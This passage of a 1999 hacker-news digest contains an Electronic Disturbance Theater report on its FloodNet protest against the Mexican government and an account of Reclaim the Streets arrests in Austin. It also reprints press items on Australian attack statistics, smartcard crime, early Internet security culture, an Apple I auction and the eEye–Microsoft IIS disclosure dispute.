The people at Electronic Civil Disobedience are planning
a virtual 'sit-in' in protest of the treatment of the
Zapatistas by the Mexican government. The sit-in will
basically be a DoS attack against several Mexican
government internet sites. This demonstration is
planned to take place on June 18 from 10:00am to
4:00pm Mexico City time.
Electronic Civil Disobedience
http://www.thing.net/~rdom/ecd/ecd.html
The June 18th Sit-in report from ECD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
JUNE 18: THE VIRTUAL AND THE REAL
ACTION ON THE INTERNET AND IN AUSTIN, TEXAS
ZAPATISTA FLOODNET AND RECLAIM THE STREETS
by Stefan Wray, June 19, 1999, 6:00 CDT
"The resistance will be as transnational as capital."
On June 18, 1999, simultaneous with the G8 meeting in Koln, Germany, people all over the world
participated in actions and events under the banner "Reclaim The Streets." Email reports coming in today
indicate that 10,000 people gathered in Nigeria and that San Francisco drew crowds of around 500. More
news and reports of events will surely be posted in the coming days. What follows is a contribution to this
emerging body of material.
Reclaim the Streets European Headquarters http://www.gn.apc.org/rts/ Below are two separate and very
different reports. The first describes the results of the virtual sit-in called by the Electronic Disturbance
Theater opposing the Mexican government that involved thousands of people from 46 countries. The
second is a longer narrative account describing events as they unfolded in Austin, Texas, an action that
involved about 50 people and resulted in three arrests. It ends with some comments on hybridity, meshing
the virtual and the real.
THE VIRTUAL
On June 15, the Electronic Disturbance Theater began sending out email announcements urging people
to join in an act of Electronic Civil Disobedience to stop the war in Mexico. The call made in conjunction
with the Reclaim The Streets day of action was intended to introduce a virtual component to the
numerous off-line actions happening all over the world. But a strong motivation for the action was also
due to the fact that in recent weeks there has been a significantly higher level of government and military
harassment of Zapatista communities in Chiapas, with reports indicating as many as 5,000 Zapatistas
have fled their communities.
The suggested action was for people using computers to point their Internet browser to a specific URL
during the hours of 4:00 and 10:00 p.m. GMT. By directing Internet browsers toward the Zapatista
FloodNet URL, during this time period, people joined a virtual sit-in. What this meant was that their
individual computer began sending re-load commands over and over again for the duration of the time
they were connected to FloodNet. In a similar way that people were out in the streets, clogging up the
streets, the repeated re-load command of the individual user - multiplied by the thousand engaged -
clogged the Internet pathways leading to the targeted web site. In this case on June 18, FloodNet was
directing these multiple re-load browser commands to the Mexican Embassy in the UK.
(http://www.demon.co.uk/mexuk)
The results of the June 18 Electronic Disturbance Theater virtual sit-in were that the Zapatista FloodNet
URL received a total of 18,615 unique requests from people's computers in 46 different countries. Of that
total, 5,373 hits on the FloodNet URL - 28.8 percent - came from people using commercial servers in the
United States - the .com addresses. People using computers in the United Kingdom accounted for the
second largest number of participants, 3,633 or 19.5 percent. People with university accounts in the U.S.,
1,677 of them, made up the third largest category of participants at 9.0 percent. Interestingly, the fourth
largest category of participants came from .mil addresses, from the U.S. military, for which there were
1,377 hits on the FloodNet URL, at 7.4 percent. Included among the military visitors were people using
computers at DISA, the Defense Information Systems Agency. [In the same way that police help to block
the streets when they show up at a demonstration, the military and government computer visitors to the
FloodNet URL inadvertently join the action.] And the fifth largest group of participants were from
Switzerland with 1,276 or 6.8 percent.
The remaining 5,329, or 28.6 percent, of global participants in the June 18 virtual sit-in came from all
continents including 21 countries in Europe (Austria, Belgium, Czech Republic, Denmark, Estonia,
Finland, France, Germany, Greece, Hungary, Ireland, Italy, Lithuania, Macedonia, Netherlands, Norway,
Poland, Portugal, Spain, Sweden and Yugoslavia), 7 countries in Latin American (Argentina, Brazil, Chile,
Colombia, Mexico, Peru and Uruguay), 6 countries in Asia (Indonesia, Japan, Malaysia, Singapore, South
Korea and Taiwan), 5 in the Middle East (Bahrain, Israel, Qatar, Saudi Arabia and Turkey), Australia and
New Zealand, Canada, Georgia (former Soviet Union), and South Africa.
The global Zapatista FloodNet action on June 18 is the first that the Electronic Disturbance Theater
called for in 1999. The group began in the spring of 1998 and launched a series of FloodNet actions
directed primarily against web sites of the Mexican government, but action targets also included the White
House, the Frankfurt Stock Exchange, the Pentagon. The highlight was in September when the group
showcased FloodNet at the Ars Electronica festival on Information Warfare in Linz, Austria. At that time
one of the targets of FloodNet was a U.S. Department of Defense web site. This action is noteworthy
because a Pentagon countermeasure since it may be one of the first known instances in which the DOD
has engaged in an offensive act of information warfare against a domestic U.S. target - an act some say
could have been illegal.
More details on the Electronic Disturbance Theater can be found at:
http://www.thing.net/~rdom/ecd/ecd.html
THE BEGINNING OF THE REAL
I turned off my computer, moved away from the screen, and left work at 5:00. My girlfriend picked me up
in the car and we passed by the bank so I could cash my paycheck. Good thing too. My balance had
literally been 99 cents. Then we drove to the radio station, KOOP, where we do a half-hour news
program every Friday.
It was hot inside the station, as it was outside. But the studio was nice and cool, so we sat there and
waited for the Working Stiff show to end and the news to begin. We listened to John do a phone interview
with someone from the pipe-fitters union. They were talking about a strike.
We started off the news with a long piece from A-Infos about the World Trade Organization. It was a
decent article but a bit too long to read on the air. The piece ended with a call for people to travel to
Seattle later in the year to oppose the third WTO ministerial conference.
After the news we walked over to join a handful of IWW folks who put out the Working Stiff Journal. They
were at Lovejoys, a bar with a decent selection of beer just off 6th Street.
I started talking to a few friends about the war in Yugoslavia and an idea I'd had that it might good to form
a focus group on the history, present, and future of war. The idea being that the left doesn't really
understand war anymore, or rather, that the left is using the same techniques to oppose war that it used
30 years ago, but that the way wars are fought has changed. The few who I talked to supported the idea
and had some good suggestions.
RUTA MAYA
After swilling down a few pints, at around 7:30, my girlfriend and I left Lovejoys and drove over to Ruta
Maya. All I knew was that the Critical Mass bike ride was to end up there. And the ride was Austin's effort
to be part of the global Reclaim The Street actions that were happening all over the world.
Ruta Maya is a coffee shop in downtown Austin's warehouse district. They import coffee from Chiapas.
Local activist groups often stage benefits and events there.
When we got to Ruta Maya people from the bike ride were already filtering in. They had started the ride
up by the university. I wasn't on the ride so I only heard snapshots of what had happened. But I learned
that a few had spent the previous night working on some stickers that said, "Closed" and "Out of Order."
These were to put on ATM machines and other relevant symbols of capital. The ride passed by the Gap.
For a moment Gap workers were harassed for selling clothes manufactured in sweatshops.
The crowd inside and outside on the elevated sidewalk was a mix of Ruta Maya regulars, people who
came to hear an acoustic guitarist playing inside, customers of Ruta Maya's cigar shop, anyone who
happened to be walking by, and of course the cyclists from the Critical Mass/RTS ride.
First I talked to some people involved in Free Radio Austin, a local micropower radio station shut down by
the FCC a few weeks ago - which is incidentally scheduled to go back on the air today. We didn't talk
about that, but about some of the problems with a new space here called Pueblos Unidos. A long story,
but basically there is a power struggle among the original tenets of this allegedly collective warehouse
space on the eastside of Austin. Too complicated to go into here. Conversations about Pueblos Unidos,
the Grassroots News Network, and Point A threaded through the evening.
The riders included people I've know from Earth First!, from the local bicycle activist scene, and a whole
new set of folks from Point A who I don’t really know. I just thought that Ruta Maya was a gathering point
after the ride was finished. But it turned out to be something else.
THE STREET After not long, some people started talking about how to encourage others to start
standing out in the street in front of Ruta Maya. People had just finished the ride and were all charged up
with energy. A moment later, two young riders were moving a construction barricade and a few orange
cones into the lane of traffic coming from the west. While at the other end of the block a group took similar
barricades and placed them to stop traffic coming from the east.
And then, one at a time, people started leaving the sidewalk or leaving the edges of the street to stand
out in the middle. For a little while there were just about 10 people. A few standing near the barricade. A
few more down at the other end of the street. And more starting to filter out right in front of Ruta Maya. I
actually hadn't anticipated this. I wanted to sit down so I asked someone to pass me down a chair from
the elevated sidewalk.
I sat on the chair in the middle of one lane. Someone else picked up another chair and sat down near me.
With barricades on both ends of the block, people sitting in chairs, cars lurching forward slowly and trying
to get out, others in Ruta Maya started to take notice, and those less inclined to be the first ones to
venture out into the street, followed. A Ruta Maya worker came out and said that needed his chair back. I
didn't argue. Ruta Maya is a cool place. And by sitting there momentarily it had served to encourage a few
more to join.
Soon there were people in both lanes of traffic out in front of Ruta Maya. At its peak maybe there were as
many as 50. Not a huge crowd. Enough to reclaim the street - temporarily. But not enough to remain once
the police started to arrive. And of course they did.
But before the police showed up, a few of the people whose idea it was to reclaim this particular section
of street spoke loudly and explained what Reclaim The Streets was all about. Small flyers titled "Whose
City Is This Anyway?" were passed out. And people started doing a "cheer" of sorts. Lacking were drums
or other instruments that are always good for stirring up a crowd.
THE POLICE
I first noticed a brown shirted Sheriff's deputy get out of a sports utility vehicle. But he simply walked by,
seemingly oblivious to what was happening. Soon thereafter the bike cops showed up. Like a number of
urban police forces in the U.S., Austin has its police-on-bicycle contingent, mostly used for patrolling the
busy downtown area.
The bike cops started to move around the crowd and address people whom they thought might be
leaders. I was actually standing with my back turned, talking to a friend, when one bike cop came up to
us. Maybe because I was smoking a cigar he thought I was a 'revolutionary leader'. (Just kidding.)
Anyway, the bike cop said to us, "I'm contacting my supervisor and if you aren't out of the street in ten
minutes, we are going to start making arrests."
I told the bike cop that I wasn't in charge. But anyway, my friend and I passed on this warning to a few
others. So when the three police vans and the handful of marked and unmarked cars showed up - to
inadvertently block the streets themselves - we were not surprised.
The three vans barreled down the road from the east and the marked and unmarked cars from the west,
stopping right at the intersection of 4th and Lavaca. Obviously, given that there were not many of us and
given that we had neither anticipated nor were we prepared to take a stand, we mostly filtered back off
the street and onto the side.
But there were a few who - for whatever reason - were not so content to give up the street that quickly.
Bike cops and regular police officers stood in the street in between the three vans and the rest of us on
the side of the road. People were jeering at the cops. I didn't see exactly what happened - or what
precipitated it - but in a flash a group of cops lunged forward and pulled someone from out of the crowd
on the side, not even someone who was standing closer to the police, but someone behind another. And
then another was arrested. And then a third.
People were yelling and screaming and the cops: "You fucking pigs!"; "Don't you have any real criminals
to arrest"; "Whose street? Our street!" They remained for awhile longer. Tensions quieted down. And the
vans and the marked and unmarked cars drove off.
All through this, my girlfriend had been trying to call a few local media outlets. She was at the payphone in
front of Ruta Maya. At one point she told me she had got through to KXAN. But no media ever showed up.
With the police gone, three of us on the way to jail, a number of the riders - who had only wanted to ride
their bikes and not get involved with this mess - on their way out, the ones who had planned this Austin
Reclaim The Street action bewilderedly consulted about how next to proceed. My girlfriend and I had both
been arrested before and were quite familiar with the process. She knew the inside of Austin's jail and
something about the procedure for getting out. She offered her advice to the younger activists and was
ready to leave them to it. But I suggested maybe we ought to also go down to the police station to help
sort things out. So we did.
THE POLICE STATION
By the time we parked the car and got inside the police station, there was already a crowd of perhaps 20
people, mostly sitting on the floor, inside the area where you ask about new arrestees. It looked like we
were now reclaiming the police station, rather than the street!
We weren't sure if the two young women and one young man were taken to this station. And there was
speculation that they could have taken them to any number of substations throughout the city, as they are
sometimes apt to do.
None of the people whose idea it was to reclaim the section the street in front of Ruta Maya were
prepared for arrests, and in Austin there aren't really known activist lawyers - like in some U.S. cities -
readily available to help in moments like this. Although a few of the people who ended up being in the
Austin RTS action were seasoned activists, most seemed to be people who had never actually had to
deal with police arrests before. Or if they had, they certainly hadn't made any arrangements in advance.
So everything was handled on the spot.
My girlfriend has a friend who is a lawyer who has helped her out in the past. While she was on the
phone to her, others were over at the main desk waiting to hear if in fact the three were at this station and
what they were being held for. Finally, at some point between 9:30 and 10:00 we learned that yes in fact
the three had been brought to this station, and what the charges were.
One was charged with a Class C misdemeanor for refusing to obey the order of a police officer. Another
was charged with a Class C misdemeanor for disorderly conduct. But the third was charged with a Class
B misdemeanor, a more severe level, for "inciting a riot."
First of all, there was no riot, by any stretch of the imagination. But more importantly, the young woman
charged with inciting a riot - as I later learned - had merely begun to yell out a cheer. She had said, "Give
me a 'P'," - and was probably going to spell "PIG" - at which point the cops lurched forward to grab her
from out of the crowd.
My girlfriend's friend who is a lawyer advised us that it would be best if a boisterous crowd did not linger
in the police station waiting area as it might only antagonize them and encourage them to hold the three
longer. So a group drifted off and went to Lovejoys - the bar where we had started the evening off earlier.
My girlfriend and I, and a couple of friends of the people being detained, remained at the police station.
We learned that the two with Class C misdemeanors would be able to be released for $200 bond,
although it wouldn't be until much later in the night, actually the wee hours of the morning, but that the
young woman charged with inciting a riot would have to wait until a judge came at 10:30 in the morning.
When we saw that it was senseless to wait at the police station any longer, the rest of us left as well,
joining others back at Lovejoys where we drank from pitchers of beer, mulled over what had just
transpired, and continued an earlier thread about some of the internal dynamic of the new warehouse
space in Austin called Pueblos Unidos.
THE NEXT MORNING In the middle of the night the two with Class C misdemeanors were bailed out. And
at 10:30 or so on June 19, my girlfriend's lawyer friend - a bit begrudgingly - had to go down to the station
to deal with the magistrate and help the one with the inciting riot charge get released. My girlfriend went
back to the police station in the morning as well - in part to console her lawyer friend who had had to be
bothered on a Friday evening she was spending with her husband who works out of town all during the
week. She was able to help get the one with the inciting riot charge out of jail, by being able to visit her
while in custody and explain the procedure for getting a personal release - but did not agree to be the
lawyer for these cases.
Compounding factors were that two of the people arrested, including the one with the inciting a riot
charge, had just returned to the country - literally on the afternoon of June 18 - after having been in
Guatemala and Mexico.
Now, a criminal lawyer will need to be found. People will have to spend precious and limited resources on
the entire legal process. Those who must return to court will have added stress and worry. And what
started out as evening or revelry ends up in the onerous world of the courts.
AFTERTHOUGHTS ON THE REAL
Several things are clear. While a degree of planning for this action was undertaken - in that minimally a
date, time, and place were chosen and the action was given some form and content - there definitely
were important elements in the planning process that were overlooked. The first, obviously being that it
should have been known by the people whose intent it was to reclaim the street to realize that this sort of
activity generally falls outside the boundary of the law, that the police were likely to show up, and that
arrests were possible. And that given the possibility of arrest, contingency plans should have been made:
i.e. there should have been a lawyer on stand by and even some sort of legal observer.
The second oversight was that there was no attention given to drawing in media, nor were any of the
participants using any audio or video recording devices. No photographs nor any videotape of the above
arrests were made to supply concrete evidence demonstrating that in fact the Class B misdemeanor
inciting to riot charge is ludicrous. And finally it seems that the nature and purpose of the action was not
made clearly manifest to passersby or to unconnected people sitting inside or outside of Ruta Maya.
All of these things - legal preparation, media work, and public relations - are aspects of street actions that
are fairly important. And there are clearly people in Austin who have strong skills in all of these areas and
whose services could have been called upon. I'm not sure, but I think the Austin RTS action was a last
minute one, pulled off by just a few people who didn't have time to do everything needed.
I don't want to sound too critical. During the moment - albeit a short one - there was a temporary
autonmous zone. People did in fact reclaim a portion of a street. But the cost of doing this is that several
people now unwittingly must face the hassle and expense of the court system.
HYBRIDITY: THE VIRTUAL AND THE REAL One year ago I wrote a few short pieces with the theme of
hybridity, talking about the goal of developing actions that combined on-line (virtual) and off-line (real)
elements. In part this was a reaction to criticism the Electronic Disturbance Theater received which
claimed that by acting purely in the virtual realm we were isolating ourselves from people who focused
more or all of their attention on doing things in the street or in the flesh. We tried to introduce this idea of
Electronic Civil Disobedience to the community of activists who every year, for the past few anyway, have
gone to the School of the Americas to participate in the more traditional civil disobedience style of action.
And at a national conference on civil disobedience held in Washington, DC, this past January, two from
the EDT were part of a panel discussion on Electronic Civil Disobedience. Even so, this notion of joint
computer-based and street-based actions has a long way to go. There is still a disjuncture, a gap,
between what's happening now on the Net and what people are doing on the street. Many people
engaged in yesterday's street action in Austin, for example, probably had no idea that the virtual
component was even taking place.
EDT's participation in the global RTS actions is another step in developing both the theory and practice of
this sort of joint engagement. The Internet is inherently global and so Internet-based actions seem to be a
logical match with global street actions. But this is not to say that the particular example of FloodNet is the
most ideal way of meshing the street and Net together. The FloodNet action is something that individuals
may join from their computers at home, work, or in an educational environment. Even though acting
simultaneously, jointly, the participants in the on-line and off-line actions in this case may have been
completely different sets of people. What can be done differently?
Some examples from Amsterdam and London over the course of the last few years are instructive. During
demonstrations against a meeting of the EU in Amsterdam - which involved massive police presence in
the streets - people created web pages in which they mapped out the location of the police. The pages
were constantly updated with relevant information to demonstrators from people sending in email
messages or calling in from pay phones or cell phones. In another example, in London during an
occupation/takeover of a Shell office, activists used a portable laptop connected to a cell phone to send
out announcements to the media and others once they were inside. They were also able to directly
update a web site during the occupation.
Austin's Reclaim The Street action was about as low tech as you can go. The most sophisticated
technology were probably the bicycles used for the first part of the action. Clearly there was no digital
technology. No interface with the Net. The closest to this was probably when my girlfriend used the
payphone right in front of Ruta Maya to unsuccessfully call media as the police were making arrests. For
a moment she tapped in to the telephone infrastructure - which is basically what the Internet is.
What would have happened or what could happen in the future if we are able to enhance these sorts of
street actions with a real-time audio and video presence? Imagine if on the elevated sidewalk in front of
Ruta Maya and out on the street several people had had video cameras and they were taping the entire
action. Further imagine that there were cables running from the cameras to the interior of the café where
people were sitting with laptop computers capable of handling video input and these laptops were
connected to a phone line in the café - a live stream of audio and video being netcast about the RTS
action to a global audience.
Video recording and netcasting the street action may not have prevented people from being arrested, but
it certainly would have captured a public record and people other than the participants and the observers
at Ruta Maya would have known about it. As it stands there is no recorded imagery or audio of the Austin
RTS action. Nor have there been any reports about it in the local media. Nor does anyone on the Net -
apart from those reading this - know about it.
One would think that in a town such as Austin - one credited as having one of the fastest growing
economies in the U.S. largely linked to the high tech computer industry - that activists here would have
the wherewithal to develop these sorts of uses of seemingly readily available digital technology. But there
are obstacles. Some of the obstacles are ideological, perhaps. A lingering anti-technology critique. Some
of the obstacles are economic. A genuine lack of access. Some obstacles may simply be that the ideas
are still new.
To conclude - well at least to stop, concluding may be too premature right now - in addition to an obvious
need for more attention to some basic legal, media, and publicity training, there is a need to think about
and to experiment more with ways of bringing the street and the Net closer together. We should address
this question: how do we bring what is happening on the street onto the Net?
The Zapatista FloodNet action in conjunction with the global Reclaim The Street actions is an example of
real-virtual hybridity at a world-wide level. But it is only one form and it lies within the area of Internet as
site for resistance and direct action. Finally, then, it seems there are at least two important areas where
further exploration is needed: the first, greater experimentation with other forms of on-line action and
electronic civil disobedience to be used jointly with actions on the street; the second, greater
experimentation with bringing the street and the Net closer together so that what happens on the street is
netcast in real-time onto the Net to a global audience.
END
@HWA
53.0 Cyber Attacks in Australia Double
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
The Australian Computer Emergency Response Team
(AusCERT) is claiming that cyber attacks in Australia
have doubled over the last year. They claim that there
has been a sharp rise in DoS attacks and recommend
that companies have strong security and policies in
place.
Sydney Morning Herald
http://www.smh.com.au/news/9906/16/text/business4.html
Australian Computer Emergency Response Team
http://www.auscert.org.au/
Sydney Morning Herald'
On guard against hacker attacks
Date: 16/06/99
By KIRSTY NEEDHAM
The average hacker is no longer a clever but disgruntled techno-geek. Security experts warned yesterday that dangerous programs, ready for download and use
against corporate Web sites, were being uncovered by simple keyword searches on the Internet.
Hacker attacks in Australia have doubled this year, according to the Australian Computer Emergency Response Team (AusCERT), which has seen around 1,500
incidents. AusCERT is part of an international organisation, CERT, that co-ordinates efforts against Internet security breaches.
One of the latest security problems has been a rise in "denial of service" attacks, where a Web site is crippled by a flood of requests for information.
"This can be easy to do and there are tools available to would-be hackers," said Mr Eric Halil, AusCERT operations manager. "You don't have to be an expert to
use them."
Mr Halil said many Web sites were also being "probed" by automated scanning tools. "It is difficult to determine what the motives are. Some people are joy riders -
they like to break and enter systems.
"Others like breaking into well-known systems like financial institutions. They earn kudos with their peers," he said.
A Forum of Incident Response and Security Teams (FIRST) conference in Brisbane this week is being attended by members from the military, business, government
and academia in 22 countries.
"Incidents tend to be international in nature. Even the local hacker around the corner breaking into a university will break in overseas first to cover the trail," said Mr
Byron Collie, an agent with the Australian Federal Police who is on secondment to the Australian defence forces' directorate of information warfare.
The FBI estimates that 80 per cent of attacks are made by disgruntled employees, with 20 per cent coming from outside the organisation.
However, Mr Collie said this was shifting towards 50 per cent as companies failed to take adequate security measures.
"Organisations need to have a security policy in place, including incident response procedures, if they want to conduct e-commerce or have any connectivity to the
Internet," said Mr Collie.
"Early law enforcement contact and protocols in handling evidence will ensure it is admissible in court. If it is left until the last minute or files have been bandied
around in e-mail, it jeopardises prosecutions."
Mr Mowgli Assor, a computer security specialist with Ohio State University, said there had been an increase in both hacking incidents and the tools available to
attack computer networks.
Infoguard, an incident response team set up by the FBI in March, was part of a move by the US Government to raise awareness of computer attacks, Mr Assor
said.
A reluctance by embarrassed companies to report attacks to the police or FBI had been seen as a problem, he said.
"Disgruntled teenagers are growing up and not shedding their ways. Hackers have been becoming smarter and taking more careful approaches. Break-ins are harder
to detect and protect against," Mr Assor said.
@HWA
54.0 SmartCards Next Stop for Internet Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Next stop? its already happening, see section 20.0 ... -Ed)
June 17th 1999
From HNN http://www.hackernews.com/
contributed by chippy
The Australian Institute of Criminology has released a
report that claims that SmartCards will be the next stop
for high-tech criminals. These new crimes will force
officials to develop new forensic processes and tool to
be able to extract data from such small storage devices.
Australian Financial Review
http://www.afr.com.au/content/990616/inform/inform2.html
Australian Institute of Criminology
http://www.aic.gov.au/
Australian Financial Review;
Smartcards may be set
to revolutionise crime
By Helen Meredith
Cyber crimebusters warn that smartcards will be the next
target for digital law breakers, with the technology
lending itself to concealment of data from law
enforcement agencies.
According to a report released yesterday by the Institute
of Criminology, smartcards may have the single greatest
impact on the conduct of crime in our society with their
ability to store, process and secure significant quantities
of data.
They are expected to make the job of policing and
bringing cyber criminals to book complicated, with
experts forced to develop new forensic processes and
tools that will enable them to analyse and extract data
from digital storage devices such as smartcards.
Entitled What is Forensic Computing? the AIC report
was released to coincide with the opening of an
international conference in Brisbane on the handling of
computer security incidents.
The Federal Minister for Justice, Senator Amanda
Vanstone, speaking during the plenary session of the
FIRST Conference, said: "We are used to seeing
computer hackers portrayed in the media as youthful
idealists who are simply engaging in a bit of mischievous
fun."
This did not match up with the reality of computer crime,
she said. Damaging digital data and communications had
the potential to ruin businesses and seriously affect
national economic interests, with criminals using digital
technology both to commit crimes and hide their
activities.
Senator Vanstone said a survey of businesses carried out
by the Office of Strategic Crime Assessment in the
Attorney-General's Department, in conjunction with the
Victorian Police and consultant Deloitte Touche
Tohmatsu, had shown that about a third of firms in the
banking, technology, communications and computer
sectors had suffered unauthorised use of their systems in
the previous 12 months.
The proportion of these attacks originating externally had
increased, a trend that was expected to continue. Until
recently, most assaults on computer systems had been
identified as internal, usually involving disgruntled
employees. Authorities were also concerned that about
42 per cent of businesses had not reported such external
cyber intrusions.
"I doubt very much that two in five businesses would fail
to call in the police should the intrusion involve a physical
breach of their security, such as a break and enter, even
if nothing was taken," she said.
The use of high-grade encryption, the loss of the human
interface in financial transactions and the lack of a paper
trail were serious impediments to law enforcement.
AIC director Dr Adam Graycar said investigating
sophisticated crimes and assembling the necessary
evidence for presentation in a court of law had become a
significant issue for police.
A new specialist law enforcement field, forensic
computing, had arisen as a result. This involved
identifying digital evidence and preserving it through the
investigation process.
@HWA
55.0 Internet Was Designed without Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Why are viruses and 'evil hackers' seemingly running
rampant all over the internet? Because in the beginning
it was designed that way. Take a romp through the
early formative years of the net, all in six or seven
paragraphs.
Washington Post
http://www.washingtonpost.com/wp-srv/WPlate/1999-06/15/150l-061599-idx.html
Vipers In the Sandbox
Used to Be, the Internet Was a Safe Place to Play
By John Schwartz
Washington Post Staff Writer
Tuesday, June 15, 1999; Page C01
Why are the newspapers full of reports of hackers defacing government
Web sites and nasty viruses wreaking havoc on computers around the
world?
In no small part it is a cultural problem that goes back to the '60s origins of
personal computing and the Internet. Many of the Internet pioneers were
bearded longhairs, academics and engineers whose techno-hippie ethos
suffused their new world. They knew each other, were part of a
community. Trust was the rule. The early Internet was much more about
openness and communication than walls and locks. The faults it was
supposed to correct were in the machines, not in us: corrupted packets,
not corrupted morals.
"Once upon a time there was the time of innocence," says Clifford Stoll,
whose work tracking down European hackers became a popular book,
"The Cuckoo's Egg." "Once upon a time computers were not used except
in academia, where there really is nothing that's mission-critical. Once upon
a time computers were mainly play toys for the techno-weirds--techie play
toys."
In that environment, hacking was part of the fun of what Stoll has called the
early Internet "sandbox."
"In that environment, there seems to be a cachet of 'Hey! I wrote a virus!
Hee-ho!' In that environment, it seems funny to break into somebody else's
computer. . . . It seems somewhat innocent to read somebody else's
e-mail."
It started with hacking telephone systems. The founders of Apple
Computer--Steve Jobs and Steve Wozniak--got their start in business
peddling "blue boxes"--little devices that allowed users to hack the
telephone network and make long-distance calls for free. These "phone
phreaks" were seen by some as cultural heroes--free spirits striking a blow
against the suits, the evil corporations seen as the enemies of spontaneity
and creativity.
Once computer systems were connected by networks, "remote hacking
was an attractive challenge," Internet pioneer Vinton Cerf recalls via
e-mail. "Surreptitiously making your way into the operating system from
your secret hideout. . . . Much of the motivation was like picking locks or
scaling walls--just to see if you could do it. Harm was not the objective,
most of the time."
Katie Hafner, who has written books about the history of the Internet and
about the lives of hackers, says that this metaphor of nerds at play is
compelling--and accurate. "It was a big open playscape for these guys,"
she says. "The Net was built as a completely open community. People
would actually be offended if files were protected." To be sure, there were
some early nods to security issues--the fledgling ARPANET, the precursor
to today's Internet, required passwords. It was funded by the military, after
all. However, "the subtext was this was an open community because this
was an experiment," Hafner says.
It was built by guys like Jon Postel, the Internet pioneer who died last year.
Postel had a vision of an Internet that didn't need a center to survive, a
network that could be governed by standards and consensus without ever
putting anybody in charge. Utopian? Sure. Vulnerable? Uh-huh.
That culture rejected attempts to create computer operating systems that
incorporated security from the ground up, but were complex and
cumbersome. Computer security expert Peter Neumann says: "Viruses
exist only because of the shortsightedness of subsequent developers who
almost completely ignored the security problems" that some designers had
effectively solved.
The problem is that the Net caught on, and in the biggest possible way.
The anarchic, antiauthoritarian, don't-tell-us-how-to-run-our-lives ethic
that defined the burgeoning network--and is still held out by most of the
experts as the source of its vitality and strength--has retained that early
vulnerability. Broader penetration of the Internet into society meant
broader penetration of society into the Internet; it became more like the
real world, and the real world is a tough place.
In '60s terms, the idea of free spirits being outside the control of central
authority was the best of all possible worlds. But with no one in charge, it
was damnedly hard to plug security holes.
A big wake-up call came in 1988 when Robert T. Morris Jr., then a
student at Cornell University, released a computer program that
single-handedly crashed systems across the Internet. His father, a famous
programmer and security expert, was of the generation that had hacked for
fun. Morris Jr. didn't mean to bring down the Net. "His mischief was kind
of in the spirit of the Net," says Hafner. But by then the Internet was no
longer a playscape, and the damage was real.
Of course if the Net's problem is anarchy, the problem with personal
computers is monarchy: Bill Gates. Microsoft "is indeed the evil empire
when it comes to robust infrastructures," says Neumann.
Two viruses that recently swept through the world's computers, Melissa
and Explore.zip, took advantage of the fact that so many millions of PCs
run on a suite of Microsoft's programs. The company's latest offerings
include security options--but the options are turned off at the factory. The
security measures make computing a little clunkier, and cut users off from
some of the bells and whistles that Microsoft writes into its programs. Says
computer security expert Eugene Spafford of Purdue University, it's as if
consumers "said they wanted faster cars," and so the vendors maximize
speed by providing "faster cars, but with no brakes and no air bags!"
Release a virus that attacks that company's software specifically, and "it's
analogous to the Spaniards bringing smallpox to the Incas," he says. "There
was no immunity--they just wiped everybody out. . . . We've really set up
our environment in an unsafe way."
Of course today's Internet is a mirror of society. It may have been
conceived in a spirit of trust and information wanting to be free and good
practical jokes. But today it's about--money. The frontier is getting settled
by corporations worth billions, all of which are promising to sell us our
future.
They have to deliver, so anti-virus programmers and network security
consultants have a market opportunity.
It's a tough time for a system that was created in an age of innocence. It
will be interesting to see if a network strong enough to survive nuclear
attack can survive its own success.
© Copyright 1999 The Washington Post Company
@HWA
56.0 Original Apple I On the Auction Block
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Cuda
What is being called the first Apple I ever sold will soon
be sold via auction. The Auctioneers are expecting bids
to go well over $40,000. One of of approximately 200
that where ever built this one includes original
documentation including the original 8-page manual. The
auction company will accept absentee bids online.
Better hurry. The live bidding starts on Tuesday June
29, at 11 a.m
La Salle Auctions
http://www.lasallegallery.com/framemac.htm
@HWA
57.0 Microsoft Calls eEye Irresponsible
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
A week after notifying Microsoft of a major hole in its
Internet Information Server 4.0 eEye Digital Security
Team went public with the information and published an
exploit for the hole. The Microsoft spin machine labeled
this action as 'Irresponsible'. The finger here should not
be pointed at eEye who did the honorable thing by
alerting the public and posting a real fix before
Microsoft, but should instead be pointed at Microsoft for
creating bad software, and even worse, concealing the
information for up to a week. Unfortunately these
articles don't seem understand that.
LA Times
http://www.latimes.com/HOME/BUSINESS/t000054445.html
Nando Times
http://www.techserver.com/story/body/0,1634,61071-97188-693078-0,00.html
The UK Register
http://www.theregister.co.uk/990618-000010.html
Associated Press - Via San Jose Mecury News
http://www.mercurycenter.com/breaking/docs/078774.htm
InfoWorld
http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm
eEye Digital Security Team
http://www.eeye.com/
Microsoft
http://www.microsoft.com/security/bulletins/ms99-019.asp
Late Update
Well, at least Forbes gets it.
Forbes
http://www.forbes.com/tool/html/99/Jun/0618/mu5.htm
Forbes;
Microsoft's security secret
By Benjamin Polen
EW YORK. 12:45PM EDT—Microsoft’s
(nasdaq: MSFT) failure to immediately alert
customers of a serious security flaw in its
Internet Information Server (IIS) could hurt the
company’s image and cost it customers as the
software giant tries to establish a position within the
competitive marketplace of mission-critical server
applications.
Microsoft knew about the vulnerability for a week but
tried to delay telling customers until it could prepare
a software patch.
But Microsoft’s efforts to suppress notification of the
IIS bug ultimately backfired and proved embarrassing
when eEye, a privately held network security
company, took the information to the public on
Tuesday.
eEye detected the bug during a beta test of a
security program and alerted Microsoft of the
problem on June 8. The vulnerability is so severe that
anyone with modest programming skills and an
Internet connection can gain complete control over a
web server running IIS, which runs on 22.3% of the
web servers on the Internet, according to research
firm Netcraft.
Despite the severity of the problem, Microsoft
stopped responding to eEye's E-mails after June 11,
according to Firas Bushnaq, CEO of eEye. After
several days, eEye decided to post an advisory on
its web site on Tuesday. The CERT Coordination
Center, a federally funded computer security
research institute at Carnegie-Mellon University,
posted an advisory on the following day, lending
credence to eEye's concerns.
Firas Bushnaq said his company acted because
